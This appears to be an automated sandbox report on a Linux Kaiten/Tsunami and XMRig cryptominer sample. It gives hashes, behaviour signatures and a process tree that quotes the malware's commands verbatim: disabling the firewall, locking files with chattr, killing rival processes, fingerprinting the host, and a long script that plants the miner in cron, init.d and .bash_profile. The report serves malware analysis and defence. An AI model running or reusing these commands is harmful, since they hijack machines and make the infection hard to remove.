Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    ubuntu-24.04_amd64
  • resource
    ubuntu2404-amd64-20240523-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
  • submitted
    11-10-2024 20:27

General

  • Target

    SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf

  • Size

    3.2MB

  • MD5

    396a812c15bd9809d0c8f438b8517827

  • SHA1

    6a8eb0ee0a05cede17a50ec04b0a549d70325dcb

  • SHA256

    d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a

  • SHA512

    83ba44b59c9aa517887d27de612b646a17e1b0e372e216e279f188a75e12759b27f181509287e08e79aa34872b59b711fc8efd014b463f58934f762a8d70e948

  • SSDEEP

    98304:EenYv0GcTOR0aUripytWEGYk91lRujZv9I:bYoOjGhnGPLlqZvW

Malware Config

Signatures

  • Detects Kaiten/Tsunami Payload 1 IoCs
  • Detects Kaiten/Tsunami payload 1 IoCs
  • Kaiten/Tsunami

    Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • Attempts to change immutable files 17 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Checks hardware identifiers (DMI) 1 TTPs 8 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

  • Creates/modifies Cron job 1 TTPs 17 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates active TCP sockets 1 TTPs 3 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies init.d 2 TTPs 3 IoCs

    Adds/modifies system service, likely for persistence.

  • Modifies systemd 2 TTPs 3 IoCs

    Adds/ modifies systemd service files. Likely to achieve persistence.

  • Reads hardware information 1 TTPs 28 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Writes file to system bin folder 5 IoCs
  • Security Software Discovery 1 TTPs 2 IoCs

    Adversaries may attempt to discover installed security software and its configurations.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Changes its process name 1 IoCs
  • Checks CPU configuration 1 TTPs 8 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 17 IoCs
  • Reads system network configuration 1 TTPs 40 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Process Discovery 1 TTPs 2 IoCs

    Adversaries may try to discover information about running processes.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 6 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf
    /tmp/SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf
    1⤵
    • Creates/modifies Cron job
    • Enumerates active TCP sockets
    • Modifies init.d
    • Modifies systemd
    • Writes file to system bin folder
    • Reads system network configuration
    • Reads runtime system information
    • Writes file to tmp directory
    PID:2435
    • /usr/bin/bash
      bash -c "ufw disable"
      2⤵
        PID:2442
      • /usr/bin/lsof
        lsof -t -i :444
        2⤵
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:2443
      • /usr/bin/lsof
        lsof -t -i :59475
        2⤵
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:2455
      • /usr/bin/pgrep
        pgrep -f ksysrvthread
        2⤵
        • Reads CPU attributes
        • Enumerates kernel/hardware configuration
        • Reads runtime system information
        PID:2463
      • /usr/bin/pgrep
        pgrep -f sysrv
        2⤵
        • Reads CPU attributes
        • Enumerates kernel/hardware configuration
        • Reads runtime system information
        PID:2464
      • /usr/bin/pgrep
        pgrep -f klibsystem4
        2⤵
        • Reads CPU attributes
        • Enumerates kernel/hardware configuration
        • Reads runtime system information
        PID:2465
      • /usr/bin/pgrep
        pgrep -f klibsystem5
        2⤵
        • Reads CPU attributes
        • Reads runtime system information
        PID:2466
      • /usr/bin/chattr
        chattr +ia /etc/init.d/dpkg-deb-package
        2⤵
          PID:2467
        • /etc/init.d/dpkg-deb-package
          /etc/init.d/dpkg-deb-package start
          2⤵
          • Executes dropped EXE
          PID:2468
          • /usr/bin/cp
            cp -f -r -- /bin/dpkg-debian /bin/dpkg-deb-package
            3⤵
              PID:2469
            • /usr/bin/nohup
              nohup ./dpkg-deb-package
              3⤵
                PID:2470
              • /usr/bin/rm
                rm -rf -- dpkg-deb-package
                3⤵
                  PID:2471
                • /usr/bin/dpkg-deb-package
                  ./dpkg-deb-package
                  3⤵
                    PID:2470
                • /usr/bin/chattr
                  chattr +ia /etc/systemd/system/dpkg-deb-package.service
                  2⤵
                    PID:2473
                  • /usr/bin/systemctl
                    systemctl daemon-reload
                    2⤵
                      PID:2474
                    • /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004
                      /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
                      2⤵
                      • Executes dropped EXE
                      • Checks hardware identifiers (DMI)
                      • Reads hardware information
                      • Checks CPU configuration
                      • Reads CPU attributes
                      • Enumerates kernel/hardware configuration
                      • Writes file to tmp directory
                      PID:2475
                      • /bin/sh
                        sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
                        3⤵
                          PID:2570
                          • /usr/bin/hostname
                            hostname -I
                            4⤵
                              PID:2575
                            • /usr/bin/awk
                              awk "{print \$1}"
                              4⤵
                                PID:2578
                              • /usr/bin/cat
                                cat /etc/ssh/sshd_config
                                4⤵
                                  PID:2589
                                • /usr/bin/grep
                                  grep "Port "
                                  4⤵
                                    PID:2591
                                  • /usr/bin/head
                                    head -n 1
                                    4⤵
                                      PID:2592
                                    • /usr/bin/awk
                                      awk "{print \"-\"\$2}"
                                      4⤵
                                        PID:2593
                                      • /usr/bin/whoami
                                        whoami
                                        4⤵
                                          PID:2599
                                        • /usr/bin/hostname
                                          hostname
                                          4⤵
                                            PID:2603
                                          • /usr/bin/grep
                                            grep -c "^processor" /proc/cpuinfo
                                            4⤵
                                            • Checks CPU configuration
                                            PID:2607
                                          • /usr/bin/grep
                                            grep -m 1 "model name" /proc/cpuinfo
                                            4⤵
                                            • Checks CPU configuration
                                            PID:2610
                                          • /usr/bin/cut
                                            cut -d: -f2
                                            4⤵
                                              PID:2611
                                            • /usr/bin/sed
                                              sed -e "s/^ *//"
                                              4⤵
                                                PID:2612
                                              • /usr/bin/sed
                                                sed -e "s/\$//"
                                                4⤵
                                                  PID:2613
                                                • /usr/bin/awk
                                                  awk "{print \$1}"
                                                  4⤵
                                                    PID:2620
                                                  • /usr/bin/awk
                                                    awk "{print \$4}"
                                                    4⤵
                                                      PID:2623
                                                    • /usr/bin/awk
                                                      awk "{print \$4}"
                                                      4⤵
                                                        PID:2627
                                                      • /usr/bin/awk
                                                        awk "{print \$3}"
                                                        4⤵
                                                          PID:2630
                                                        • /usr/bin/awk
                                                          awk "{print \$4}"
                                                          4⤵
                                                            PID:2633
                                                          • /usr/bin/awk
                                                            awk "{print \$1}"
                                                            4⤵
                                                              PID:2636
                                                            • /usr/bin/awk
                                                              awk "{print \$2\" \"\$3\" \"\$4}"
                                                              4⤵
                                                                PID:2638
                                                            • /bin/sh
                                                              sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
                                                              3⤵
                                                                PID:2639
                                                                • /usr/bin/ps
                                                                  ps -A "-ostat,ppid"
                                                                  4⤵
                                                                  • Reads CPU attributes
                                                                  • Enumerates kernel/hardware configuration
                                                                  • Reads runtime system information
                                                                  PID:2640
                                                                • /usr/bin/awk
                                                                  awk "/[zZ]/ && !a[\$2]++ {print \$2}"
                                                                  4⤵
                                                                    PID:2641
                                                                  • /usr/bin/id
                                                                    id -u
                                                                    4⤵
                                                                      PID:2643
                                                                    • /usr/bin/ps
                                                                      ps x
                                                                      4⤵
                                                                      • Reads CPU attributes
                                                                      • Enumerates kernel/hardware configuration
                                                                      • Reads runtime system information
                                                                      PID:2644
                                                                    • /usr/bin/grep
                                                                      grep /etc/cron
                                                                      4⤵
                                                                        PID:2645
                                                                      • /usr/bin/grep
                                                                        grep -v grep
                                                                        4⤵
                                                                          PID:2646
                                                                      • /bin/sh
                                                                        sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
                                                                        3⤵
                                                                        • Security Software Discovery
                                                                        PID:2648
                                                                        • /usr/bin/id
                                                                          id -u
                                                                          4⤵
                                                                            PID:2649
                                                                          • /usr/bin/ps
                                                                            ps aux
                                                                            4⤵
                                                                            • Checks CPU configuration
                                                                            • Reads CPU attributes
                                                                            • Process Discovery
                                                                            • Reads runtime system information
                                                                            PID:2650
                                                                          • /usr/bin/grep
                                                                            grep -v grep
                                                                            4⤵
                                                                              PID:2651
                                                                            • /usr/bin/grep
                                                                              grep -v -- "-bash[[:space:]]*\$"
                                                                              4⤵
                                                                                PID:2652
                                                                              • /usr/bin/grep
                                                                                grep -v /usr/sbin/httpd
                                                                                4⤵
                                                                                  PID:2653
                                                                                • /usr/bin/awk
                                                                                  awk "{if(\$3>30.0) print \$2}"
                                                                                  4⤵
                                                                                    PID:2654
                                                                                • /bin/sh
                                                                                  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
                                                                                  3⤵
                                                                                  • Security Software Discovery
                                                                                  PID:2661
                                                                                  • /usr/bin/id
                                                                                    id -u
                                                                                    4⤵
                                                                                      PID:2662
                                                                                    • /usr/bin/ps
                                                                                      ps aux
                                                                                      4⤵
                                                                                      • Checks CPU configuration
                                                                                      • Reads CPU attributes
                                                                                      • Enumerates kernel/hardware configuration
                                                                                      • Process Discovery
                                                                                      • Reads runtime system information
                                                                                      PID:2664
                                                                                    • /usr/bin/grep
                                                                                      grep -v grep
                                                                                      4⤵
                                                                                        PID:2665
                                                                                      • /usr/bin/grep
                                                                                        grep -- "-bash[[:space:]]*\$"
                                                                                        4⤵
                                                                                          PID:2666
                                                                                        • /usr/bin/awk
                                                                                          awk "{if(\$3>30.0) print \$2}"
                                                                                          4⤵
                                                                                            PID:2667
                                                                                          • /usr/bin/wc
                                                                                            wc -l
                                                                                            4⤵
                                                                                              PID:2668
                                                                                        • /usr/bin/systemctl
                                                                                          systemctl enable dpkg-deb-package.service
                                                                                          2⤵
                                                                                          • Changes its process name
                                                                                          PID:2657
                                                                                          • /usr/bin/getopt
                                                                                            getopt -o r: --long root: -- enable dpkg-deb-package
                                                                                            3⤵
                                                                                              PID:2659
                                                                                            • /usr/sbin/update-rc.d
                                                                                              /usr/sbin/update-rc.d dpkg-deb-package defaults
                                                                                              3⤵
                                                                                                PID:2660
                                                                                                • /usr/local/sbin/systemctl
                                                                                                  systemctl daemon-reload
                                                                                                  4⤵
                                                                                                    PID:2669
                                                                                                  • /usr/local/bin/systemctl
                                                                                                    systemctl daemon-reload
                                                                                                    4⤵
                                                                                                      PID:2669
                                                                                                    • /usr/sbin/systemctl
                                                                                                      systemctl daemon-reload
                                                                                                      4⤵
                                                                                                        PID:2669
                                                                                                      • /usr/bin/systemctl
                                                                                                        systemctl daemon-reload
                                                                                                        4⤵
                                                                                                          PID:2669
                                                                                                      • /usr/sbin/update-rc.d
                                                                                                        /usr/sbin/update-rc.d dpkg-deb-package enable
                                                                                                        3⤵
                                                                                                          PID:2800
                                                                                                          • /usr/local/sbin/systemctl
                                                                                                            systemctl daemon-reload
                                                                                                            4⤵
                                                                                                              PID:2801
                                                                                                            • /usr/local/bin/systemctl
                                                                                                              systemctl daemon-reload
                                                                                                              4⤵
                                                                                                                PID:2801
                                                                                                              • /usr/sbin/systemctl
                                                                                                                systemctl daemon-reload
                                                                                                                4⤵
                                                                                                                  PID:2801
                                                                                                                • /usr/bin/systemctl
                                                                                                                  systemctl daemon-reload
                                                                                                                  4⤵
                                                                                                                    PID:2801
                                                                                                              • /usr/bin/chattr
                                                                                                                chattr +ia /bin/dpkg-debian
                                                                                                                2⤵
                                                                                                                  PID:3051
                                                                                                                • /usr/bin/crontab
                                                                                                                  crontab -r
                                                                                                                  2⤵
                                                                                                                    PID:3052
                                                                                                                  • /usr/bin/pkill
                                                                                                                    pkill -f .klibsystem4
                                                                                                                    2⤵
                                                                                                                    • Reads CPU attributes
                                                                                                                    • Reads runtime system information
                                                                                                                    PID:3053
                                                                                                                  • /usr/bin/bash
                                                                                                                    bash -c "echo \"5 * * * * nohup /tmp/.klibsystem5 >/dev/null 2>&1 &\" | crontab -"
                                                                                                                    2⤵
                                                                                                                      PID:3054
                                                                                                                      • /usr/bin/crontab
                                                                                                                        crontab -
                                                                                                                        3⤵
                                                                                                                        • Creates/modifies Cron job
                                                                                                                        PID:3056
                                                                                                                    • /usr/bin/chattr
                                                                                                                      chattr +ia /etc/cron.d/.lib-knlib4
                                                                                                                      2⤵
                                                                                                                        PID:3057
                                                                                                                      • /usr/bin/chattr
                                                                                                                        chattr +ia /var/spool/cron/.lib-knlib4
                                                                                                                        2⤵
                                                                                                                          PID:3058
                                                                                                                        • /usr/bin/chattr
                                                                                                                          chattr +ia /etc/cron.hourly/.lib-knlib4
                                                                                                                          2⤵
                                                                                                                            PID:3059
                                                                                                                          • /usr/bin/chattr
                                                                                                                            chattr +ia /etc/cron.daily/.lib-knlib4
                                                                                                                            2⤵
                                                                                                                              PID:3060
                                                                                                                            • /usr/bin/chattr
                                                                                                                              chattr +ia /etc/cron.weekly/.lib-knlib4
                                                                                                                              2⤵
                                                                                                                                PID:3061
                                                                                                                              • /usr/bin/chattr
                                                                                                                                chattr +ia /etc/cron.monthly/.lib-knlib4
                                                                                                                                2⤵
                                                                                                                                  PID:3062
                                                                                                                                • /usr/bin/chattr
                                                                                                                                  chattr -ia /etc/anacrontab
                                                                                                                                  2⤵
                                                                                                                                  • Attempts to change immutable files
                                                                                                                                  PID:3063
                                                                                                                                • /usr/bin/chattr
                                                                                                                                  chattr +ia /etc/anacrontab
                                                                                                                                  2⤵
                                                                                                                                  • Attempts to change immutable files
                                                                                                                                  PID:3064
                                                                                                                                • /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004
                                                                                                                                  /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Checks hardware identifiers (DMI)
                                                                                                                                  • Reads hardware information
                                                                                                                                  • Checks CPU configuration
                                                                                                                                  • Reads CPU attributes
                                                                                                                                  • Enumerates kernel/hardware configuration
                                                                                                                                  PID:3065
                                                                                                                                  • /bin/sh
                                                                                                                                    sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
                                                                                                                                    3⤵
                                                                                                                                    • Attempts to change immutable files
                                                                                                                                    PID:3066
                                                                                                                                    • /usr/bin/hostname
                                                                                                                                      hostname -I
                                                                                                                                      4⤵
                                                                                                                                      • Attempts to change immutable files
                                                                                                                                      PID:3069
                                                                                                                                    • /usr/bin/awk
                                                                                                                                      awk "{print \$1}"
                                                                                                                                      4⤵
                                                                                                                                        PID:3071
                                                                                                                                      • /usr/bin/cat
                                                                                                                                        cat /etc/ssh/sshd_config
                                                                                                                                        4⤵
                                                                                                                                          PID:3073
                                                                                                                                        • /usr/bin/grep
                                                                                                                                          grep "Port "
                                                                                                                                          4⤵
                                                                                                                                            PID:3074
                                                                                                                                          • /usr/bin/head
                                                                                                                                            head -n 1
                                                                                                                                            4⤵
                                                                                                                                              PID:3075
                                                                                                                                            • /usr/bin/awk
                                                                                                                                              awk "{print \"-\"\$2}"
                                                                                                                                              4⤵
                                                                                                                                                PID:3076
                                                                                                                                              • /usr/bin/whoami
                                                                                                                                                whoami
                                                                                                                                                4⤵
                                                                                                                                                  PID:3077
                                                                                                                                                • /usr/bin/hostname
                                                                                                                                                  hostname
                                                                                                                                                  4⤵
                                                                                                                                                    PID:3078
                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                    grep -c "^processor" /proc/cpuinfo
                                                                                                                                                    4⤵
                                                                                                                                                    • Checks CPU configuration
                                                                                                                                                    PID:3079
                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                    grep -m 1 "model name" /proc/cpuinfo
                                                                                                                                                    4⤵
                                                                                                                                                    • Checks CPU configuration
                                                                                                                                                    PID:3082
                                                                                                                                                  • /usr/bin/cut
                                                                                                                                                    cut -d: -f2
                                                                                                                                                    4⤵
                                                                                                                                                      PID:3083
                                                                                                                                                    • /usr/bin/sed
                                                                                                                                                      sed -e "s/^ *//"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:3084
                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                        sed -e "s/\$//"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:3085
                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                          awk "{print \$1}"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:3088
                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                            awk "{print \$4}"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3091
                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                              awk "{print \$4}"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:3094
                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                awk "{print \$3}"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:3097
                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                  awk "{print \$4}"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:3100
                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                    awk "{print \$1}"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:3103
                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                      awk "{print \$2\" \"\$3\" \"\$4}"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:3105
                                                                                                                                                                    • /bin/sh
                                                                                                                                                                      sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:3106
                                                                                                                                                                        • /usr/bin/ps
                                                                                                                                                                          ps -A "-ostat,ppid"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                          • Enumerates kernel/hardware configuration
                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                          PID:3107
                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                          awk "/[zZ]/ && !a[\$2]++ {print \$2}"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:3108
                                                                                                                                                                          • /usr/bin/id
                                                                                                                                                                            id -u
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:3110
                                                                                                                                                                            • /usr/bin/ps
                                                                                                                                                                              ps x
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                              • Enumerates kernel/hardware configuration
                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                              PID:3111
                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                              grep /etc/cron
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:3112
                                                                                                                                                                              • /usr/bin/grep
                                                                                                                                                                                grep -v grep
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:3113
                                                                                                                                                                              • /bin/sh
                                                                                                                                                                                sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 